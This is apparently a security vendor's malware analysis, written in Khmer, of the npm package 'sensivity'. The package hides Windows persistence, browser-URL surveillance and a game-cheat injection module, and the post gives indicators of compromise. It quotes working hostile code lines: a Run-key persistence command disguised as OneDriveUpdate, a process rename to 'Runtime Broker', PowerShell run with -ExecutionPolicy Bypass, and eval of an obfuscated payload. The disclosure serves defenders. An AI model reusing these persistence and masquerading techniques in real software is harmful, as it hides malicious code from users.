PairLoop៖ បន្ទះបញ្ជាពីចម្ងាយដែលលាក់នៅក្នុងកញ្ចប់ npm

PairLoop៖ កញ្ចប់ npm មួយ កំណែចិតសិប និងបន្ទះបញ្ជាពីចម្ងាយ Windows ដែលលាក់ទុក

​មាតិកា

ប្រកាសដែលត្រូវតែអាន

ប្រកាសថ្មីៗបំផុតដែលគួរឱ្យចាប់អារម្មណ៍

TL; កុង

កញ្ចប់ npm ភាពរសើប វាពិពណ៌នាខ្លួនវាថាជា "ផ្ទាំងគ្រប់គ្រងភាពប្រែប្រួល"។ នៅលើ Windows វាដើរតួជាឧបករណ៍បញ្ជាពីចម្ងាយ និងជាឧបករណ៍ឃ្លាំមើល។

ចំណុចចូលរបស់វា, launcher.jsប្តូរឈ្មោះដំណើរការផ្ទាល់ខ្លួនរបស់វាទៅជា Runtime Broker សរសេរតម្លៃ Run-key ដែលចាប់ផ្តើមដោយស្វ័យប្រវត្តិដែលមានឈ្មោះថា OneDriveUpdate ដែលបើកដំណើរការកញ្ចប់ឡើងវិញតាមរយៈ VBScript ដែលលាក់ បង្កើត PowerShell ជាមួយ -ExecutionPolicy Bypassហើយបន្ទាប់មកវាយតម្លៃបន្ទុកម៉ាស៊ីនមេដែលមានទំហំ 171 KB ដែលបិទបាំង រួមជាមួយនឹងម៉ូឌុលដើមដែលមានទំហំ 6.87 MB sens.node.

វាបម្រើបន្ទះត្រួតពិនិត្យការភ្ជាប់ទូរស័ព្ទនៅលើច្រក TCP 3000 ហើយអាន URL របារអាសយដ្ឋានរបស់កម្មវិធីរុករកសកម្មតាមរយៈ Windows UIAutomation ដោយមើលវីដេអូ YouTube ដែលមានកូដរឹងមួយ។

ផ្នែកពីរដែលពីមុនអានថាទុកចោលជាប្រអប់ខ្មៅឥឡូវនេះត្រូវបានដោះស្រាយហើយ។ ម៉ាស៊ីនមេដែលបិទបាំង server.obf.js, ប្រើគ្រោងការណ៍អារេខ្សែអក្សរ obfuscator.io RC4; ការអនុវត្តឧបករណ៍ឌិកូដរបស់វាឡើងវិញក្រៅបណ្តាញ (គ្មានការប្រតិបត្តិ JavaScript) ស្តារចំណុចបញ្ចប់ខាងក្រៅតែមួយ — https://izopi.com/check.php — រួមជាមួយនឹងកូនសោសាធារណៈ RSA ដែលបានបង្កប់ ដែលប្រើដើម្បីផ្ទៀងផ្ទាត់ការឆ្លើយតបអាជ្ញាប័ណ្ណដែលបានចុះហត្ថលេខា។

ម៉ូឌុលដើម, sens.nodeមិនត្រូវបានខ្ចប់ទេ៖ តារាងនាំចូល និងខ្សែអក្សរដែលបានបង្កប់របស់វាកំណត់អត្តសញ្ញាណវាជា DirectX 11 / Dear ImGui ដែលផ្តល់នូវលក្ខណៈពិសេស aimbot, ESP (wall-hack) និង triggerbot ដែលជំរុញដោយការចាក់ដំណើរការពីចម្ងាយ និងការអាន/សរសេរអង្គចងចាំ។

ខ្សែអក្សរនៅខាងក្នុងវាយោងទៅលើអង្គភាពយានយន្ត និងទីតាំងផែនទីដែលស្របនឹង GTA V / FiveM។ កញ្ចប់ npm គឺជាកញ្ចប់រុំព័ទ្ធការចែកចាយ និងការតស៊ូជុំវិញម៉ូឌុលដើមនោះ។

សញ្ញាកំណត់គឺដំណើរការ មិនមែនបច្ចេកទេសទេ៖ អ្នកបោះពុម្ពផ្សាយអនាមិកតែមួយបានចេញផ្សាយប្រហែលចិតសិបកំណែនៃកញ្ចប់មួយ — 2.5.0 ឆ្លងកាត់ 2.5.69 ។ — ក្នុងរយៈពេលពីរបីថ្ងៃ ដោយម្នាក់ៗកាន់ឧបករណ៍បាញ់ដូចគ្នា។

គ្មានការដំឡើងទេ hooksបន្ទុក​ផ្ទុក​ទិន្នន័យ​ដំណើរការ​តែ​នៅពេល​ដែល​កញ្ចប់​ត្រូវ​បាន​ចាប់ផ្តើម​ប៉ុណ្ណោះ។

ការវាយប្រហារ៖ របៀបដែលវាដំណើរការ

sensivity ដឹកជញ្ជូនឯកសារចំនួនដប់។ package.json មានតិចតួចណាស់៖ គ្មានវាលឃ្លាំង គ្មានអាជ្ញាប័ណ្ណ ឈ្មោះក្លែងក្លាយមេ និងឈ្មោះក្លែងក្លាយប៊ីនពីរ (sensivity, sens) ដែលចង្អុលទៅ launcher.js និងស្គ្រីបចាប់ផ្តើមរបស់ node launcher.js។ មិនមានការដំឡើងក្រោយ ឬការដំឡើងជាមុនទេ។ គ្មានអ្វីដំណើរការលើការដំឡើង npm ទេ។ ឥរិយាបថដែលបានពិពណ៌នាខាងក្រោមដំណើរការនៅពេលដែលអ្នកប្រើប្រាស់ចាប់ផ្តើមកញ្ចប់ — តាមរយៈ bin shim ស្គ្រីបចាប់ផ្តើម ឬតម្រូវការ។

tarball មាន launcher ម៉ាស៊ីនមេដែលបិទបាំង ម៉ូឌុលដើម ស្គ្រីប Visual Basic និងថតឯកសារ public/web សម្រាប់ផ្ទាំងបញ្ជា។ launcher.js គឺជាកម្មវិធីរៀបចំដែលអាចអានបាន។ តក្កវិជ្ជាដែលសំខាន់នៅពេលដំណើរការស្ថិតនៅក្នុង blobs ពីរដែលវាផ្ទុក — ម៉ាស៊ីនមេដែលបិទបាំង និងម៉ូឌុលដើមដែលបានចងក្រង ដែលទាំងពីរត្រូវបានដោះស្រាយខាងក្រោម។

 ការក្លែងបន្លំដំណើរការ និងកម្មវិធីធ្វើបច្ចុប្បន្នភាព OneDrive ក្លែងក្លាយ

នៅដើមដំបូងនៃដំណើរការ launcher.js កំណត់ឈ្មោះដំណើរការផ្ទាល់ខ្លួនរបស់វាពីរដង៖

   javascript process.title = 'Runtime Broker'; 

Runtime Broker គឺជាដំណើរការ Windows ស្របច្បាប់ (RuntimeBroker.exe) ដែលសម្របសម្រួលការអនុញ្ញាតកម្មវិធី។ ការប្តូរឈ្មោះដំណើរការ Node ឱ្យត្រូវគ្នានឹងវាមានន័យថា ការក្រឡេកមើល Task Manager យ៉ាងរហ័សមិនបង្ហាញអ្វីចម្លែកនោះទេ។

ភាពស្ថិតស្ថេរត្រូវបានសរសេរតាមរយៈ PowerShell ជាជាង API ចុះបញ្ជីដោយផ្ទាល់៖

javascript execSync(`powershell -NoProfile -Command "$k='HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run';$n='OneDriveUpdate';$v='wscript.exe \"${vbs}\"';Set-ItemProperty -Path $k -Name $n -Value $v -Force|Out-Null"`, { stdio: 'ignore', timeout: 5000 }); 

តម្លៃ​ចាប់ផ្ដើម​ដោយស្វ័យប្រវត្តិ​មាន​ឈ្មោះថា OneDriveUpdate ហើយវាមិនចង្អុលទៅកញ្ចប់ដោយផ្ទាល់ទេ។ វាចង្អុលទៅ wscript.exe ដែលដំណើរការ OneDrive.Standalone.Updater.vbs ដែលបានភ្ជាប់មកជាកញ្ចប់។ ស្គ្រីបនោះបើកដំណើរការ node launcher.js ឡើងវិញនៅក្នុងបង្អួចដែលលាក់។ ទាំងឈ្មោះ Run-key និងឈ្មោះឯកសារ VBScript ខ្ចីម៉ាកយីហោ Microsoft ដូច្នេះធាតុចាប់ផ្ដើមដោយស្វ័យប្រវត្តិត្រូវបានអានជាកិច្ចការ OneDrive ធម្មតា។

PowerShell ជាមួយនឹងការរំលងគោលការណ៍ប្រតិបត្តិ

កម្មវិធីបើកដំណើរការ (launcher) បញ្ចេញទៅ PowerShell ម្តងហើយម្តងទៀត។ ចំណុចសំខាន់ដែលម៉ាស៊ីនស្កេនសម្គាល់ថាសំខាន់គឺការបើកដំណើរការ .ps1 ដែលបានបង្កើតជាមួយនឹងគោលការណ៍ប្រតិបត្តិដែលត្រូវបានបិទ៖

javascript exec('start "Windows PowerShell" powershell -NoProfile -ExecutionPolicy Bypass -File "' + psFile + '"', { cwd: APP_DIR }); 

ការរំលងគោលការណ៍ប្រតិបត្តិលុបការត្រួតពិនិត្យការចុះហត្ថលេខាលើស្គ្រីបក្នុងស្រុកសម្រាប់ការអំពាវនាវនោះ។ ស្គ្រីបដែលបានបង្កើតដោះស្រាយការងារឃ្លាំមើលកម្មវិធីរុករក និងការរកឃើញបង្អួចដែលបានពិពណ៌នានៅក្នុងផ្នែកបន្ទាប់។

ម៉ាស៊ីនមេដែលបិទបាំង និងម៉ូឌុលដើម

បន្ទាប់ពីការដំឡើងរួច launcher.js ផ្ទុក និងប្រតិបត្តិ payload ពិតប្រាកដរបស់វា៖

const serverCode = fs.existsSync(path.join(APP_DIR, 'server.obf.js')) ? path.join(APP_DIR, 'server.obf.js') : path.join(APP_DIR, 'server.js'); eval(fs.readFileSync(serverCode, 'utf8'));

server.obf.js មានទំហំ 171 KB នៃ _0x-array obfuscation — លំនាំ JavaScript ដែលខ្សែអក្សរ និងឧបករណ៍កំណត់អត្តសញ្ញាណនីមួយៗត្រូវបានជំនួសដោយលិបិក្រមទៅជាអារេដែលបានសាប់ បន្ទាប់មកដកឯកសារយោងនៅពេលដំណើរការ។ គ្រោងការណ៍នេះគឺជាវ៉ារ្យ៉ង់ RC4 ដែលផលិតដោយ obfuscator.io៖ មុខងារឌិកូដតែមួយ base64 ឌិកូដធាតុអារេ ហើយបន្ទាប់មក RC4 ឌិគ្រីបវាជាមួយកូនសោក្នុងមួយការហៅ។ ការអនុវត្តឌិកូដនោះឡើងវិញនៅក្នុងស្គ្រីបដាច់ដោយឡែក — ដំណើរការតែការអនុវត្តឡើងវិញលើអារេខ្សែអក្សរ 821 ដែលបានស្រង់ចេញ មិនមែន JavaScript របស់កញ្ចប់ទេ — ធ្វើឱ្យវាស្អាត។ អ្វីដែលលេចចេញមកគឺតិចតួច ប៉ុន្តែ decisive: URL ខាងក្រៅមួយ https://izopi.com/check.php` ត្រូវបានកំណត់ទៅ LICENSE_URL ថេរ; RSA PUBLIC_KEY_PEM ដែលបានបង្កប់`; បន្ទះក្នុងស្រុកបញ្ជូន /api/kill, /api/qr.png, /api/trigger, /api/url, /trigger/off និង /trigger/status; និងខ្សែអក្សរ child_process, crypto និង [Sensivity] sens.node ត្រូវបានផ្ទុក — ខ្សែអក្សរចុងក្រោយគឺជាបន្ទាត់កំណត់ហេតុពិតប្រាកដដែលកម្មវិធីបើកដំណើរការសរសេរឡើងវិញទៅកាន់ម៉ូឌុលកម្មវិធី។ ចំណុចបញ្ចប់គឺជាការត្រួតពិនិត្យអាជ្ញាប័ណ្ណ៖ អតិថិជនបង្ហោះឧបករណ៍កំណត់អត្តសញ្ញាណ (ម៉ាស៊ីនមេដែលបិទបាំងធ្វើទ្រង់ទ្រាយលេខសម្គាល់ Discord៖ ខ្សែអក្សរ %s) ហើយសោ RSA ផ្ទៀងផ្ទាត់ការឆ្លើយតបដែលបានចុះហត្ថលេខារបស់ម៉ាស៊ីនមេ។

sens.node គឺជាកម្មវិធីបន្ថែមដើមដែលបានចងក្រងទំហំ 6.87 MB ហើយវាមិនត្រូវបានខ្ចប់ទេ — អង់ត្រូពីផ្នែកស្ថិតនៅចន្លោះ 5.6–6.6 ហើយតារាងនាំចូល និងនាំចេញ PE គឺនៅដដែល ដូច្នេះសមត្ថភាពរបស់វាអាចអានបានដោយផ្ទាល់។ វានាំចេញ napi_register_module_v1 standard ចំណុចចូល N-API របស់ Node ដូច្នេះម៉ាស៊ីនមេដែលបានវាយតម្លៃផ្ទុកវាជាមួយនឹងតម្រូវការធម្មតា។ តារាងនាំចូលរបស់វាគឺប្រាប់។ ពី KERNEL32 វាទាញយក OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread, K32EnumProcessModules និង Process32First/NextW — សំណុំស្តង់ដារសម្រាប់កំណត់ទីតាំងដំណើរការផ្សេងទៀត ការបែងចែកអង្គចងចាំនៅខាងក្នុងវា និងការអាន ឬសរសេរអង្គចងចាំនោះ។ ពី USER32 វាទាញយក GetAsyncKeyState, GetKeyState, mouse_event និង SetCursorPos; វាភ្ជាប់ d3d11.dll, D3DCOMPILER_43 និង dwmapi សម្រាប់ការដាក់លើអេក្រង់ និងសំណុំ WINHTTP ពេញលេញសម្រាប់ការហៅទូរស័ព្ទបណ្តាញ។ ខ្សែអក្សរដែលបានបង្កប់របស់វាដាក់ឈ្មោះសំណុំលក្ខណៈពិសេសដោយគ្មានភាពមិនច្បាស់លាស់៖ Enable Aimbot, Aimbot FOV, Box ESP, Skeleton ESP, Triggerbot, ESP Builder, Vehicle ESP, Electron Anticheat detected និងបដា Dear ImGui Dear ImGui 1.91.3 WIP។ ខ្សែអក្សរទីតាំង និងអង្គភាពដូចជា Grapeseed Medical Clinic និងវាក្យសព្ទ vehicle-ESP គឺស្របនឹង GTA V / FiveM។

ការបំបែកនេះត្រូវបានធ្វើឡើងដោយចេតនា៖ launcher.js ដែលអាចអានបានមានតែផ្នែកដែលម៉ាស៊ីនស្កេនអានបានយ៉ាងងាយស្រួល - persistence, masquerade, eval call ខ្លួនវា - ខណៈពេលដែល obfuscation លាក់ទំនាក់ទំនង runtime របស់ម៉ាស៊ីនខាងក្រៅមួយ ហើយប្រព័ន្ធគោលពីរមានតក្កវិជ្ជា game-overlay និង process-injection។ launcher គឺជា shell ស្តើង និងអាចធ្វើសវនកម្មបាន។ ម៉ាស៊ីនមេ obfuscated លាក់អត្តសញ្ញាណបណ្តាញ។ ម៉ូឌុលដើមគឺជា payload។ យើងពិពណ៌នាអំពីការនាំចូល និង strings របស់ប្រព័ន្ធគោលពីរថាជា read; យើងមិនសន្និដ្ឋានគោលបំណងរបស់ប្រតិបត្តិករពីពួកវាទេ។

 បន្ទះត្រួតពិនិត្យការផ្គូផ្គងទូរស័ព្ទនៅលើច្រក 3000

កម្មវិធីបើកដំណើរការគ្រប់គ្រងម៉ាស៊ីនបម្រើបណ្ដាញក្នុងស្រុកនៅលើច្រក TCP 3000 ហើយចាត់ទុកវាជា singleton។ វាសាកសួររកអ្នកស្តាប់ដែលមានស្រាប់ ហើយលុបវាមុនពេលភ្ជាប់៖

 javascript execSync('powershell -NoProfile -Command "$c=Get-NetTCPConnection -LocalPort 3000 -State Listen -EA 0; if($c){$c | ForEach-Object { Stop-Process -Id $_.OwningProcess -Force -EA 0 }}"', { stdio: 'ignore', timeout: 5000 }); 

បន្ទះនេះអាចចូលមើលបាននៅ http://localhost:3000 ជាមួយនឹង URL បម្រុងទុក LAN ដែលបានអ៊ិនកូដយ៉ាងរឹងមាំនៃ http://192.168.1.16:3000។ ថតឯកសារ public/ និងឥរិយាបថរបស់បន្ទះគឺស្របនឹងលំហូរភ្ជាប់ QR៖ ទូរស័ព្ទស្កេនលេខកូដ ហើយភ្ជាប់ទៅម៉ាស៊ីនជាឧបករណ៍បញ្ជាពីចម្ងាយ។ គ្មានដែនបញ្ជា និងត្រួតពិនិត្យខាងក្រៅលេចឡើងជាអត្ថបទច្បាស់លាស់នៅក្នុងកម្មវិធីបើកដំណើរការទេ — ប៉ុន្តែ ដូចដែលការបំបាត់ការភាន់ច្រឡំខាងលើបង្ហាញ មានដែនមួយមានវត្តមាននៅក្នុងម៉ាស៊ីនមេដែលភាន់ច្រឡំ៖ ចំណុចបញ្ចប់អាជ្ញាប័ណ្ណ izopi.com។ បន្ទះខ្លួនវាគឺជាមូលដ្ឋាន និងមានវិសាលភាព LAN; ម៉ាស៊ីនចេញតែមួយគត់គឺការត្រួតពិនិត្យអាជ្ញាប័ណ្ណនោះ។

គំរូ​អ្នកគ្រប់គ្រង/កម្មករ​ដែល​បាន​ផ្ដាច់​ចេញ​ពី​គ្នា​រក្សា​ដំណើរការ​ឲ្យ​នៅរស់។ កម្មវិធី​ចាប់ផ្ដើម​បង្កើត​ខ្លួន​វា​ឡើង​វិញ​ជាមួយ​នឹង​ទង់​បរិស្ថាន SENSIVITY_SUPERVISOR និង SENSIVITY_WORKER ដោយ​កូន​នីមួយៗ​កំពុង​ដំណើរការ​ត្រូវ​បាន​លាក់ ដូច្នេះ​ការ​សម្លាប់​ដំណើរការ​មួយ​ទុក​ឲ្យ​មាន​អ្នក​ឃ្លាំមើល​ចាប់ផ្ដើម​វា​ឡើង​វិញ។

ការឃ្លាំមើលកម្មវិធីរុករកតាមអ៊ីនធឺណិត និងសញ្ញា YouTube

ឥរិយាបថជាក់លាក់បំផុតគឺការត្រួតពិនិត្យកម្មវិធីរុករក។ launcher.js បង្កើត PowerShell ដែលជំរុញ Windows UIAutomation ឱ្យអានរបារអាសយដ្ឋានរបស់កម្មវិធីរុករកដែលកំពុងដំណើរការ៖

 javascript '$pattern = $edit.GetCurrentPattern([System.Windows.Automation.ValuePattern]::Pattern)', 

ValuePattern ប្រគល់ខ្លឹមសារអត្ថបទនៃធាតុ UI។ ដោយអនុវត្តទៅការគ្រប់គ្រងការកែសម្រួលរបារអាសយដ្ឋានរបស់កម្មវិធីរុករក វាប្រគល់ URL ដែលជនរងគ្រោះកំពុងមើល — ដោយគ្មានផ្នែកបន្ថែមកម្មវិធីរុករក ដោយមិនប៉ះប្រវត្តិរូបនៅលើថាស និងដោយគ្មានទំពក់ API។ ស្គ្រីបដែលបានបង្កើតធ្វើម្តងទៀតនូវបញ្ជី $browserNames ហើយស្រង់ URL ឬចំណងជើងបង្អួចនៃកម្មវិធីរុករកណាមួយនៅខាងមុខ។

URL នោះត្រូវបានសាកល្បងប្រឆាំងនឹងគោលដៅដែលបានអ៊ិនកូដរឹងតែមួយ៖

 javascript const TARGET_YOUTUBE_VIDEO_ID = 'wJWta2lO0Lw'; 

កម្មវិធីបើកដំណើរការនឹងធ្វើការស្ទង់មតិលើរង្វិលជុំរយៈពេលបីវិនាទីសម្រាប់បង្អួចកម្មវិធីរុករកដែលបង្ហាញ YouTube ហើយ PowerShell ដែលបានបង្កើតមានគូ Get-YouTubeBrowser / Test-TargetYouTubeUrl ដែលត្រូវគ្នានឹងលេខសម្គាល់វីដេអូនោះ។ ឥទ្ធិពលដែលអាចសង្កេតឃើញមានពីរយ៉ាង៖ URL រុករកសកម្មត្រូវបានអានចេញពីអេក្រង់របស់ជនរងគ្រោះ ហើយអន្តរកម្មរបស់ម៉ាស៊ីនជាមួយវីដេអូ YouTube ជាក់លាក់មួយត្រូវបានរកឃើញ។ យើងពិពណ៌នាអំពីយន្តការ និងគោលដៅ។ យើងមិនសន្និដ្ឋានពីហេតុផលពីពួកវាទេ។

ការអានរបារអាសយដ្ឋានគឺជាអ្វីដែលម៉ាស៊ីនស្កេនដាក់ស្លាកថា sensitive_data_enumeration — ប្រភព Process::env និង UIAutomation ដែលផ្តល់ពេលវេលាដំណើរការដែលមានសមត្ថភាពបណ្តាញ។ វាមើលទៅមិនបង្កគ្រោះថ្នាក់នៅពេលដាច់ដោយឡែក ហើយដោះស្រាយបានតែចំពោះការឃ្លាំមើលនៅពេលដែលវដ្តជីវិតទិន្នន័យត្រូវបានតាមដានពីប្រភព UIAutomation ទៅម៉ាស៊ីនមេដែលមិនច្បាស់លាស់។

ពេលវេលា និងការវិវត្តន៍នៃកំណែ

ភាពរសើបមិនមែនជាការផ្ទុកឡើងតែម្តងនោះទេ។ គណនីអ្នកបោះពុម្ពផ្សាយមានកំណែដែលបានបោះពុម្ពផ្សាយប្រហែលចិតសិបនៃកញ្ចប់តែមួយនេះ ហើយកំណែថ្មីៗនៅតែបន្តមកដល់ក្នុងអំឡុងពេលពិនិត្យឡើងវិញ។ កម្មវិធីបើកដំណើរការពង្រីកលក្ខណៈពិសេសម្តងមួយៗនៅទូទាំងខ្សែ 2.5.x ខណៈពេលដែលភាពស្ថិតស្ថេរ និងការផ្ទុកបន្ទុករបស់វានៅតែថេរ។

កាលបរិច្ឆេទ (UTC) កំណែដែលបានសង្កេតឃើញ ស្ថានភាព​កម្មវិធី​ចាប់ផ្ដើម
2026-06-02 2.5.8 - 2.5.46 (25​) កម្មវិធីបើកដំណើរការបន្ទះ QR មូលដ្ឋាន; ភាពស្ថិតស្ថេរនៃគ្រាប់ចុចរត់; ការវាយតម្លៃម៉ាស៊ីនមេដែលត្រូវបានបិទបាំង។
2026-06-03 2.5.53 - 2.5.61 (6​) ស្នាមម្រាមដៃដូចគ្នា; ការបង្ក្រាបដានកុងសូល។
2026-06-04 2.5.67, 2.5.68 (2​) បន្ថែមគោលដៅចូលរួម YouTube ដែលបានខ្ទាស់ wJWta2lO0Lw.
2026-06-05 2.5.0 - 2.5.69 (24​) ការបំពេញចន្លោះប្រហោង បោះពុម្ពផ្សាយឡើងវិញនៅទូទាំងជួរផលិតផល; អ្នកត្រួតពិនិត្យ/អ្នកឃ្លាំមើលកម្មករ។

ការអានកម្មវិធីបើកដំណើរការនៅទូទាំងតំណាងដែលបានទាញយក — 2.5.0, 2.5.36 និង 2.5.69 — បង្ហាញបួនកម្រិត។ ការបង្កើតដំបូងបំផុតមានកម្មវិធីបើកដំណើរការផ្គូផ្គង QR មូលដ្ឋាន។ ចាប់ពី 2.5.33 ឧបករណ៍ប្រមូលផលរបារអាសយដ្ឋាន UIAutomation លេចឡើង។ ចាប់ពី 2.5.58 ស្រទាប់គ្រប់គ្រងអ្នកត្រួតពិនិត្យត្រូវបានបន្ថែម។ ចាប់ពី 2.5.64 អ្នកត្រួតពិនិត្យ/អ្នកឃ្លាំមើលកម្មករដែលបានផ្ដាច់ចេញបំពេញសំណុំ។ ពេញមួយរឿង មានរឿងបួនដែលមិនដែលផ្លាស់ប្តូរ៖ កូនសោ OneDriveUpdate Run, ដំណក់ OneDrive.Standalone.Updater.vbs, eval'd server.obf.js និងម៉ូឌុលដើម sens.node។

រលក​ថ្ងៃទី 05 ខែមិថុនា ឆ្នាំ 2026 គឺគួរឱ្យកត់សម្គាល់ ពីព្រោះវាបានបោះពុម្ពឡើងវិញនូវលេខកំណែទាប — 2.5.0 ដល់ 2.5.15 — ដែលស្ថិតនៅក្រោមកំណែដែលបានបញ្ជាក់កាលពីប៉ុន្មានថ្ងៃមុន។ ឥទ្ធិពលគឺជាបន្ទាត់ 2.5.x ដែលជាប់គ្នានៅលើបញ្ជីឈ្មោះ ដែលកំណែនីមួយៗមានកម្មវិធីបើកដំណើរការដូចគ្នា។

សូចនាករនៃការសម្របសម្រួល

សូចនាករទាំងអស់ខាងក្រោមត្រូវបានអានដោយផ្ទាល់ពីកញ្ចប់ tarball។ កម្មវិធីបើកដំណើរការដែលអាចអានបានមានតែរង្វិលជុំត្រឡប់មកវិញ និងអាសយដ្ឋាន LAN ឯកជនតែមួយប៉ុណ្ណោះ។ ឈ្មោះម៉ាស៊ីនខាងក្រៅតែមួយគឺ izopi.com ត្រូវបានសង្គ្រោះដោយការ deobfuscating server.obf.js ក្រៅបណ្តាញ។

វាយបញ្ចូល ទ្រនិចបង្ហាញ ភក្ដិកំណត់ត្រាកំណត់
កញ្ចប់សមាជិក npm:sensivity (≈៧០ កំណែ, 2.5.0-2.5.69) អ្នកបោះពុម្ពផ្សាយកញ្ចប់តែមួយ; គ្មានឃ្លាំង; គ្មានអាជ្ញាប័ណ្ណ។
ឯកសារ launcher.js ឧបករណ៍​រៀបចំ​ដែល​អាច​អាន​បាន; គោលដៅ​មេ និង​ធុងសំរាម។
ឯកសារ server.obf.js (≈១៧១ គីឡូបៃ) obfuscator.io RC4 string-array payload ដែលផ្ទុកតាមរយៈ eval(fs.readFileSync(...)).
ឯកសារ sens.node (≈៦.៨៧ មេកាបៃ) កម្មវិធីបន្ថែម N-API សម្រាប់ Node PE32+ x86-64; SHA-256 66b674884042fca2f056d06854325ea0e8bc902d4e3cdaeafd5fe08c7d0aab40.
ឯកសារ OneDrive.Standalone.Updater.vbs កម្មវិធីបើកដំណើរការឡើងវិញដែលលាក់ (node launcher.js).
Network https://izopi.com/check.php ចំណុចបញ្ចប់អាជ្ញាប័ណ្ណ/ការអនុញ្ញាតត្រូវបានសង្គ្រោះពីម៉ាស៊ីនមេដែលលាក់បាំង; កូនសោសាធារណៈ RSA ដែលបានបង្កប់ផ្ទៀងផ្ទាត់ការឆ្លើយតប។
សមត្ថភាព OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateRemoteThread ការចាក់ដំណើរការពីចម្ងាយ និងសមត្ថភាពអាន/សរសេរអង្គចងចាំ។
សមត្ថភាព Enable Aimbot, Box ESP, Triggerbot, Vehicle ESP, Dear ImGui 1.91.3 WIP DirectX 11 / ImGui game overlay ដែលអនុវត្តមុខងារ aimbot, ESP និង triggerbot។
ចុះបញ្ជី HKCU\Software\Microsoft\Windows\CurrentVersion\Run → OneDriveUpdate តម្លៃចាប់ផ្តើមដោយស្វ័យប្រវត្តិចង្អុលទៅ wscript.exe និងកម្មវិធីបើកដំណើរការ VBScript។
ដំណើរការ process.title = 'Runtime Broker' ក្លែងបន្លំជាដំណើរការ Windows Runtime Broker ស្របច្បាប់។
ឥរិយាបថ powershell -NoProfile -ExecutionPolicy Bypass -File <generated>.ps1 ការរំលង​គោលការណ៍​ប្រតិបត្តិ​ដែល​ប្រើ​សម្រាប់​ស្គ្រីប PowerShell ដែល​បាន​បង្កើត។
ឥរិយាបថ UIAutomation ValuePattern អានរបារអាសយដ្ឋានកម្មវិធីរុករក អាន URL នៃបង្អួចកម្មវិធីរុករកផ្ទៃខាងមុខ។
ឥរិយាបថ លេខសម្គាល់វីដេអូគោលដៅ wJWta2lO0Lwការស្ទង់មតិ YouTube រយៈពេល 3 វិនាទី សញ្ញាត្រួតពិនិត្យការចូលរួមដែលបានខ្ទាស់។
Network http://localhost:3000, បម្រុង http://192.168.1.16:3000 ផ្ទាំងបញ្ជាផ្គូផ្គង QR ត្រូវបានបង្ហាញនៅក្នុងមូលដ្ឋាន និងនៅលើ LAN។
បរិស្ថាន SENSIVITY_SUPERVISOR, SENSIVITY_WORKER ទង់សម្របសម្រួលដំណើរការឃ្លាំមើលដែលបានផ្ដាច់ចេញ។

ការសន្មត់ ផលប៉ះពាល់ និងអ្នកការពារ

កញ្ចប់នេះត្រូវបានបោះពុម្ពផ្សាយដោយគណនី npm តែមួយដែលអ៊ីមែលដែលបានបញ្ជាក់គឺជាអាសយដ្ឋាន Gmail ដែលមិនទាន់បានផ្ទៀងផ្ទាត់។ គណនីនេះមានពិន្ទុកេរ្តិ៍ឈ្មោះចុះបញ្ជីអវិជ្ជមានយ៉ាងខ្លាំង រក្សា និងបោះពុម្ពផ្សាយតែកញ្ចប់មួយនេះប៉ុណ្ណោះ ហើយមិនមានឃ្លាំងប្រភពដែលភ្ជាប់ទេ។ យើងមិនទាន់បានផ្ទៀងផ្ទាត់ភាពជាម្ចាស់នៃអ៊ីមែលនោះទេ ហើយយើងសន្មតយុទ្ធនាការនេះទៅគណនីអ្នកបោះពុម្ពផ្សាយ មិនមែនទៅបុគ្គលណាម្នាក់ដែលមានឈ្មោះនោះទេ។ កម្មវិធីបើកដំណើរការមិនមានហេដ្ឋារចនាសម្ព័ន្ធអត្ថបទច្បាស់លាស់ទេ ប៉ុន្តែម៉ាស៊ីនខាងក្រៅតែមួយឥឡូវនេះត្រូវបានគេស្គាល់៖ ម៉ាស៊ីនមេដែលបិទបាំងទាក់ទង izopi.com សម្រាប់ការត្រួតពិនិត្យអាជ្ញាប័ណ្ណ ហើយម៉ូឌុលដើម — អានពីតារាងនាំចូល និងខ្សែអក្សររបស់វាជាជាងបញ្ច្រាសការណែនាំដោយការណែនាំ — គឺជាការដាក់ហ្គេមដែលចាក់ចូលទៅក្នុង និងអានអង្គចងចាំនៃដំណើរការផ្សេងទៀត។

ផលប៉ះពាល់ដែលអាចសង្កេតឃើញគឺធ្លាក់ទៅលើអ្នកប្រើប្រាស់ Windows ដែលដំឡើង និងដំណើរការភាពរសើបដោយរំពឹងថានឹងមានឧបករណ៍ប្រើប្រាស់ផ្ទាំងបញ្ជា។ នៅលើម៉ាស៊ីនទាំងនោះ កញ្ចប់នេះបង្កើតភាពស្ថិតស្ថេរចាប់ផ្តើមដោយស្វ័យប្រវត្តិដែលក្លែងបន្លំជាភារកិច្ច OneDrive ប្តូរឈ្មោះខ្លួនវាដើម្បីធ្វើត្រាប់តាមដំណើរការប្រព័ន្ធ អាន URL នៃអ្វីដែលអ្នកប្រើប្រាស់កំពុងរុករក និងបង្កើតបន្ទះភ្ជាប់ដែលភ្ជាប់ម៉ាស៊ីនទៅឧបករណ៍បញ្ជាពីចម្ងាយតាមរយៈបណ្តាញក្នុងស្រុក។ អ្នកត្រួតពិនិត្យ/អ្នកឃ្លាំមើលកម្មករមានន័យថា ការសម្លាប់ដំណើរការតែមួយមិនលុបវាចេញទេ។ ធាតុ Run-key នឹងនៅរស់រានមានជីវិតបន្ទាប់ពីចាប់ផ្ដើមឡើងវិញ។ macOS និង Linux មិនត្រូវបានកំណត់គោលដៅដោយកម្មវិធីបើកដំណើរការទេ — ផ្លូវភាពស្ថិតស្ថេរ PowerShell និង UIAutomation គឺសម្រាប់តែ Windows ប៉ុណ្ណោះ។

